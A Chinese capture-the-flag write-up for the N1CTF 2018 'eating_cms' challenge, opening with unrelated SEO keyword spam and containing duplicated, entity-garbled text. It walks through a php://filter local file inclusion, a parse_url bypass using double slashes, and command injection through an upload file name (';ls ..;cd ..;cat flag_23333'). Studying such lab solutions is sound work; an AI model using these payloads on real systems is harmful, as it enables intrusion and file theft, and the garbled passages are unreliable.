网站自己服务器,WordPress是静态么,做景区网站建设的公司,正版google下载[N1CTF 2018]eating_cms
知识点
文件上传
解题
这个题感觉还好#xff0c;知识点真心不难#xff0c;就是全混在一起。
思路差不多挺离谱
首先看到#xff0c;有一个登录界面#xff0c;然后猜测有注册界面
admin注册不了#xff0c;随便注册一个账号。
注册之后知识点真心不难就是全混在一起。
思路差不多挺离谱
首先看到有一个登录界面然后猜测有注册界面
admin注册不了随便注册一个账号。
注册之后进行登录。
登录完成自动进入user.php?pageguest
将page传入伪协议尝试读取内容
/user.php?pagephp://filter/readconvert.base64-encode/resourceuser然后看到包含了function.php
一路包含下去就行
最后看到
/user.php?pagephp://filter/convert.base64-encode/resourceffffllllaaaaggg发现被拦截
看到 parse_url函数过滤
所以可以使用两个//进行过滤
//user.php?pagephp://filter/convert.base64-encode/resourceffffllllaaaaggg然后看到m4aaannngggeee
最后看到
templates/upload.html进行访问后看到一个上传界面。
看源代码。。。
发现他是假的。。。。。
真正的在filename。
/user.php?pagem4aaannngggeee发现真正的上传点
文件名可以直接执行命令
发现过滤了 /
所以利用…进行绕过
;ls ..;cd ..;cat flag_23333得到flag
